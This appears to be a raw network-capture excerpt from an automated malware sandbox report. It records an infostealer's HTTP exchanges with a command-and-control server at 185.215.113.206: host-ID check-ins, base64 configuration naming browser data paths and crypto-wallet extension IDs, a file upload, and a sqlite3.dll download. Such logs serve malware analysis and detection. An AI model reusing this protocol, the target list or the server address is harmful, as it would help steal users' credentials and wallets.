                                                                                                                                                                                                                                                                                        Data Raw: 2d 2d 2d 2d 2d 2d 46 43 47 49 4a 44 42 41 46 43 42 41 41 4b 45 43 47 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 44 42 33 41 36 39 44 41 41 36 45 32 33 37 31 35 34 33 35 31 30 0d 0a 2d 2d 2d 2d 2d 2d 46 43 47 49 4a 44 42 41 46 43 42 41 41 4b 45 43 47 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 46 43 47 49 4a 44 42 41 46 43 42 41 41 4b 45 43 47 44 47 43 2d 2d 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: ------FCGIJDBAFCBAAKECGDGCContent-Disposition: form-data; name="hwid"2DB3A69DAA6E2371543510------FCGIJDBAFCBAAKECGDGCContent-Disposition: form-data; name="build"stok------FCGIJDBAFCBAAKECGDGC--
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:07.719496012 CET407INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:49:07 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                        Content-Length: 180
                                                                                                                                                                                                                                                                                        Keep-Alive: timeout=5, max=99
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Data Raw: 5a 47 4e 6b 59 57 59 78 4e 44 42 6b 4e 54 5a 68 59 6a 6b 30 4e 47 4d 32 4f 44 45 32 5a 47 45 32 59 6d 51 7a 4e 32 59 7a 4f 44 5a 6b 4d 47 49 35 59 6a 67 79 5a 6a 63 32 4d 54 59 77 4e 44 52 6b 4f 54 5a 6a 59 54 45 31 4d 7a 59 31 4e 44 41 32 5a 54 52 6a 4e 6a 55 78 59 57 45 7a 5a 44 51 33 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 42 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 77 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d
                                                                                                                                                                                                                                                                                        Data Ascii: ZGNkYWYxNDBkNTZhYjk0NGM2ODE2ZGE2YmQzN2YzODZkMGI5YjgyZjc2MTYwNDRkOTZjYTE1MzY1NDA2ZTRjNjUxYWEzZDQ3fHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDB8MHwxfDF8MXwxfDF8MXwwfHlibmNiaHlsZXBtZXw=
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:07.806503057 CET470OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----HDAFBAEBKJKFIDHJJKJK
                                                                                                                                                                                                                                                                                        Host: 185.215.113.206
                                                                                                                                                                                                                                                                                        Content-Length: 268
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Data Raw: 2d 2d 2d 2d 2d 2d 48 44 41 46 42 41 45 42 4b 4a 4b 46 49 44 48 4a 4a 4b 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 63 64 61 66 31 34 30 64 35 36 61 62 39 34 34 63 36 38 31 36 64 61 36 62 64 33 37 66 33 38 36 64 30 62 39 62 38 32 66 37 36 31 36 30 34 34 64 39 36 63 61 31 35 33 36 35 34 30 36 65 34 63 36 35 31 61 61 33 64 34 37 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 46 42 41 45 42 4b 4a 4b 46 49 44 48 4a 4a 4b 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 46 42 41 45 42 4b 4a 4b 46 49 44 48 4a 4a 4b 4a 4b 2d 2d 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: ------HDAFBAEBKJKFIDHJJKJKContent-Disposition: form-data; name="token"dcdaf140d56ab944c6816da6bd37f386d0b9b82f7616044d96ca15365406e4c651aa3d47------HDAFBAEBKJKFIDHJJKJKContent-Disposition: form-data; name="message"browsers------HDAFBAEBKJKFIDHJJKJK--
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:08.247930050 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:49:08 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                        Content-Length: 2028
                                                                                                                                                                                                                                                                                        Keep-Alive: timeout=5, max=98
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 51 7a 70 63 55 48 4a 76 5a 33 4a 68 62 53 42 47 61 57 78 6c 63 31 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 58 45 46 77 63 47 78 70 59 32 46 30 61 57 39 75 58 48 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 44 42 38 51 32 68 79 62 32 31 70 64 57 31 38 58 45 4e 6f 63 6d 39 74 61 58 56 74 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 77 77 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 4d 48 [TRUNCATED]
                                                                                                                                                                                                                                                                                        Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8QzpcUHJvZ3JhbSBGaWxlc1xHb29nbGVcQ2hyb21lXEFwcGxpY2F0aW9uXHxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfDB8Q2hyb21pdW18XENocm9taXVtXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXwwfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8MHxUb3JjaHxcVG9yY2hcVXNlciBEYXRhfGNocm9tZXwwfDB8Vml2YWxkaXxcVml2YWxkaVxVc2VyIERhdGF8Y2hyb21lfHZpdmFsZGkuZXhlfCVMT0NBTEFQUERBVEElXFZpdmFsZGlcQXBwbGljYXRpb25cfENvbW9kbyBEcmFnb258XENvbW9kb1xEcmFnb25cVXNlciBEYXRhfGNocm9tZXwwfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGVwaWMuZXhlfCVMT0NBTEFQUERBVEElXEVwaWMgUHJpdmFjeSBCcm93c2VyXEFwcGxpY2F0aW9uXHxDb2NDb2N8XENvY0NvY1xCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8YnJvd3Nlci5leGV8QzpcUHJvZ3JhbSBGaWxlc1xDb2NDb2NcQnJvd3NlclxBcHBsaWNhdGlvblx8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDOlxQcm9ncmFtIEZpbGVzXEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxBcHBsaWNhdGlvblx8Q2Vu
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:08.247958899 CET1020INData Raw: 64 43 42 43 63 6d 39 33 63 32 56 79 66 46 78 44 5a 57 35 30 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 4a 55 78 50 51 30 46 4d 51 56 42 51 52 45
                                                                                                                                                                                                                                                                                        Data Ascii: dCBCcm93c2VyfFxDZW50QnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8JUxPQ0FMQVBQREFUQSVcQ2VudEJyb3dzZXJcQXBwbGljYXRpb25cfDdTdGFyfFw3U3Rhclw3U3RhclxVc2VyIERhdGF8Y2hyb21lfDB8MHxDaGVkb3QgQnJvd3NlcnxcQ2hlZG90XFVzZXIgRGF0YXxjaHJvbWV8MHwwfE1pY3Jvc29
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:08.581809044 CET469OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----KJECFHCBKKEBAKFIJDHI
                                                                                                                                                                                                                                                                                        Host: 185.215.113.206
                                                                                                                                                                                                                                                                                        Content-Length: 267
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Data Raw: 2d 2d 2d 2d 2d 2d 4b 4a 45 43 46 48 43 42 4b 4b 45 42 41 4b 46 49 4a 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 63 64 61 66 31 34 30 64 35 36 61 62 39 34 34 63 36 38 31 36 64 61 36 62 64 33 37 66 33 38 36 64 30 62 39 62 38 32 66 37 36 31 36 30 34 34 64 39 36 63 61 31 35 33 36 35 34 30 36 65 34 63 36 35 31 61 61 33 64 34 37 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 43 46 48 43 42 4b 4b 45 42 41 4b 46 49 4a 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 43 46 48 43 42 4b 4b 45 42 41 4b 46 49 4a 44 48 49 2d 2d 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: ------KJECFHCBKKEBAKFIJDHIContent-Disposition: form-data; name="token"dcdaf140d56ab944c6816da6bd37f386d0b9b82f7616044d96ca15365406e4c651aa3d47------KJECFHCBKKEBAKFIJDHIContent-Disposition: form-data; name="message"plugins------KJECFHCBKKEBAKFIJDHI--
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:09.021327019 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:49:08 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                        Content-Length: 7116
                                                                                                                                                                                                                                                                                        Keep-Alive: timeout=5, max=97
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED]
                                                                                                                                                                                                                                                                                        Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:09.021399021 CET1236INData Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46
                                                                                                                                                                                                                                                                                        Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:09.021409988 CET248INData Raw: 66 47 52 75 5a 32 31 73 59 6d 78 6a 62 32 52 6d 62 32 4a 77 5a 48 42 6c 59 32 46 68 5a 47 64 6d 59 6d 4e 6e 5a 32 5a 71 5a 6d 35 74 66 44 46 38 4d 48 77 77 66 45 74 6c 5a 58 42 6c 63 69 42 58 59 57 78 73 5a 58 52 38 62 48 42 70 62 47 4a 75 61 57
                                                                                                                                                                                                                                                                                        Data Ascii: fGRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfDF8MHwwfEtlZXBlciBXYWxsZXR8bHBpbGJuaWlhYmFja2RqY2lvbmtvYmdsbWRkZmJjam98MXwwfDB8U29sZmxhcmUgV2FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWd
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:09.021642923 CET1236INData Raw: 59 57 31 6d 61 32 78 72 62 58 77 78 66 44 42 38 4d 48 78 4c 53 45 4e 38 61 47 4e 6d 62 48 42 70 62 6d 4e 77 63 48 42 6b 59 32 78 70 62 6d 56 68 62 47 31 68 62 6d 52 70 61 6d 4e 74 62 6d 74 69 5a 32 35 38 4d 58 77 77 66 44 42 38 56 47 56 36 51 6d
                                                                                                                                                                                                                                                                                        Data Ascii: YW1ma2xrbXwxfDB8MHxLSEN8aGNmbHBpbmNwcHBkY2xpbmVhbG1hbmRpamNtbmtiZ258MXwwfDB8VGV6Qm94fG1uZmlmZWZrYWpnb2ZrY2prZW1pZGlhZWNvY25ramVofDF8MHwwfFRlbXBsZXxvb2tqbGJraWlqaW5ocG1uamZmY29mam9uYmZiZ2FvY3wxfDB8MHxHb2J5fGpua2VsZmFuamtlYWRvbmVjYWJlaGFsbWJncGZ
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:09.021662951 CET1236INData Raw: 62 6d 46 6e 59 32 5a 69 63 47 6c 6c 62 57 35 72 5a 48 42 76 62 57 4e 6a 62 6d 70 69 62 47 31 71 66 44 46 38 4d 48 77 77 66 45 78 6c 59 58 41 67 56 47 56 79 63 6d 45 67 56 32 46 73 62 47 56 30 66 47 46 70 61 6d 4e 69 5a 57 52 76 61 57 70 74 5a 32
                                                                                                                                                                                                                                                                                        Data Ascii: bmFnY2ZicGllbW5rZHBvbWNjbmpibG1qfDF8MHwwfExlYXAgVGVycmEgV2FsbGV0fGFpamNiZWRvaWptZ25sbWplZWdqYWdsbWVwYm1wa3BpfDF8MHwwfFRyZXpvciBQYXNzd29yZCBNYW5hZ2VyfGltbG9pZmtnamFnZ2hubmNqa2hnZ2RoYWxtY25ma2xrfDF8MHwwfEF1dGhlbnRpY2F0b3J8YmhnaG9hbWFwY2RwYm9ocGh
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:09.021672964 CET1236INData Raw: 59 32 4e 70 62 6d 68 68 63 47 52 69 66 44 46 38 4d 48 77 77 66 45 39 77 5a 58 4a 68 49 46 64 68 62 47 78 6c 64 48 78 6e 62 32 70 6f 59 32 52 6e 59 33 42 69 63 47 5a 70 5a 32 4e 68 5a 57 70 77 5a 6d 68 6d 5a 57 64 6c 61 32 52 6e 61 57 4a 73 61 33
                                                                                                                                                                                                                                                                                        Data Ascii: Y2NpbmhhcGRifDF8MHwwfE9wZXJhIFdhbGxldHxnb2poY2RnY3BicGZpZ2NhZWpwZmhmZWdla2RnaWJsa3wwfDB8MXxUcnVzdCBXYWxsZXR8ZWdqaWRqYnBnbGljaGRjb25kYmNiZG5iZWVwcGdkcGh8MXwwfDB8UmlzZSAtIEFwdG9zIFdhbGxldHxoYmJnYmVwaGdvamlrYWpoZmJvbWhsbW1vbGxwaGNhZHwxfDB8MHxSYWl
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:09.021753073 CET916INData Raw: 62 57 70 74 61 32 4e 68 5a 6d 4e 6f 63 48 42 69 62 6e 42 75 61 47 52 74 62 32 35 38 4d 58 77 77 66 44 42 38 52 57 78 73 61 53 41 74 49 46 4e 31 61 53 42 58 59 57 78 73 5a 58 52 38 62 32 4e 71 5a 48 42 74 62 32 46 73 62 47 31 6e 62 57 70 69 59 6d
                                                                                                                                                                                                                                                                                        Data Ascii: bWpta2NhZmNocHBibnBuaGRtb258MXwwfDB8RWxsaSAtIFN1aSBXYWxsZXR8b2NqZHBtb2FsbG1nbWpiYm9nZmlpYW9mcGhiamdjaGh8MXwwfDB8VmVub20gV2FsbGV0fG9qZ2dtY2hsZ2huamxhcG1mYm5qaG9sZmpraWlkYmNofDF8MHwwfFB1bHNlIFdhbGxldCBDaHJvbWl1bXxjaW9qb2Nwa2NsZmZsb21iYmNmaWdjaWp
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:09.099354982 CET470OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----KKFHJDAEHIEHJJKFBGDA
                                                                                                                                                                                                                                                                                        Host: 185.215.113.206
                                                                                                                                                                                                                                                                                        Content-Length: 268
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Data Raw: 2d 2d 2d 2d 2d 2d 4b 4b 46 48 4a 44 41 45 48 49 45 48 4a 4a 4b 46 42 47 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 63 64 61 66 31 34 30 64 35 36 61 62 39 34 34 63 36 38 31 36 64 61 36 62 64 33 37 66 33 38 36 64 30 62 39 62 38 32 66 37 36 31 36 30 34 34 64 39 36 63 61 31 35 33 36 35 34 30 36 65 34 63 36 35 31 61 61 33 64 34 37 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 48 4a 44 41 45 48 49 45 48 4a 4a 4b 46 42 47 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 48 4a 44 41 45 48 49 45 48 4a 4a 4b 46 42 47 44 41 2d 2d 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: ------KKFHJDAEHIEHJJKFBGDAContent-Disposition: form-data; name="token"dcdaf140d56ab944c6816da6bd37f386d0b9b82f7616044d96ca15365406e4c651aa3d47------KKFHJDAEHIEHJJKFBGDAContent-Disposition: form-data; name="message"fplugins------KKFHJDAEHIEHJJKFBGDA--
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:09.538762093 CET335INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:49:09 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                        Content-Length: 108
                                                                                                                                                                                                                                                                                        Keep-Alive: timeout=5, max=96
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38
                                                                                                                                                                                                                                                                                        Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:09.603564024 CET203OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----HJJDGHCBGDHIECBGIDAE
                                                                                                                                                                                                                                                                                        Host: 185.215.113.206
                                                                                                                                                                                                                                                                                        Content-Length: 6907
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:09.603564024 CET6907OUTData Raw: 2d 2d 2d 2d 2d 2d 48 4a 4a 44 47 48 43 42 47 44 48 49 45 43 42 47 49 44 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 63 64 61 66 31
                                                                                                                                                                                                                                                                                        Data Ascii: ------HJJDGHCBGDHIECBGIDAEContent-Disposition: form-data; name="token"dcdaf140d56ab944c6816da6bd37f386d0b9b82f7616044d96ca15365406e4c651aa3d47------HJJDGHCBGDHIECBGIDAEContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:10.669698000 CET202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:49:09 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                        Keep-Alive: timeout=5, max=95
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:11.637670994 CET94OUTGET /68b591d6548ec281/sqlite3.dll HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.215.113.206
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:12.076374054 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:49:11 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                        Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT
                                                                                                                                                                                                                                                                                        ETag: "10e436-5e7ec6832a180"
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        Content-Length: 1106998
                                                                                                                                                                                                                                                                                        Content-Type: application/x-msdos-program
